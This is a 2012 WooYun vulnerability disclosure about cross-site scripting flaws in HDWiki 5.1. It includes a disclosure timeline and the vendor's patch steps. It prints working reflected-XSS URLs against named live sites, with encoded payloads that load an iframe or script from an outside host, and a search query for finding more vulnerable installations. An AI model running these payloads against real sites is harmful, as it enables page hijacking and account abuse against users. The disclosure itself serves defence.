漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-010564
漏洞标题:互动维客HDWiki(5.1及以下)各种xss 0day
相关厂商:互动在线(北京)科技有限公司
漏洞作者: random_
提交时间:2012-08-04 17:39
修复时间:2012-08-09 17:40
公开时间:2012-08-09 17:40
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-08-04: 细节已通知厂商并且等待厂商处理中
2012-08-09: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
这个有一定的用户数量,可csrf、劫持首页、蠕虫等,cog也在其列。
详细说明:
由于偶尔原因发现cog存在wiki导致的xss可劫持首页,发现它的wiki是hdwiki的5.1版本。于是测试了其他的hdwiki发现存在同样的xss问题。
问题总结如下。
1. hdwiki的搜索有非持久xss,如:
http://www.laohuaxia.com/index.php?search-fulltext-title-%5C%22%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1
http://wiki.chowngroup.com/index.php?search-fulltext-title-%5C%22%3E%3Cscript%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%2Fq%26%2346%3Bjs%3E--all-0-within-time-desc-1
http://wiki.chowngroup.com/index.php?search-fulltext-title-TAG%3A%5C%22%3E%5C%27%3E%3Ciframe%2Fsrc%3D%2F%2Ftmxk%26%2346%3Borg%3E--all-0-within-time-desc-1
2. hdwiki编辑词条的存储型xss,
http://www.laohuaxia.com/index.php?doc-view-1572
http://tmxk.org/thread-625-1-1.html
词条标题,词条标签,词条内容均存在服务端未过滤的问题。
3. hdwiki留言的存储型xss
关键字:http://www.google.com.tw/search?q=intitle:powered+by+HDWiki
漏洞证明:
修复方案:
过滤各种提交,修复编辑器,打补丁。
版权声明:转载请注明来源 random_@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2012-08-09 17:40
厂商回复:
最新状态:
2012-08-09:首先感谢乌云网友提出此漏洞,我们技术部人员经过努力,修复信息如下:详情:漏洞1、hdwiki编辑词条的存储型xss漏洞2、hdwiki的搜索有非持久xss漏洞3、HDWiki 任意用户密码修改漏洞修复前须知:请提前做好代码备份工作,如您有做过二次开发,请对比代码,谨慎处理。修复步骤:1、请下载您对应编码版本的附件补丁包到本地并解压2、拷贝附件中的doc.php,user.php,reference.php至/control/下面(覆盖原有文件)3、(此步骤只针对HDWiki5.1版本的用户)拷贝附件中的editor.htm,viewdoc.htm至/view/default/下(覆盖原有文件)4、拷贝附件中的hdwiki.js至/js/jqeditor/下(覆盖原有文件)5、(此步骤只针对5.0UTF8版本的用户)拷贝附件中的install.php至/install/下(覆盖原有文件)帖子内容如下:http://kaiyuan.hudong.com/bbs/viewthread.php?tid=115225&extra=page%3D1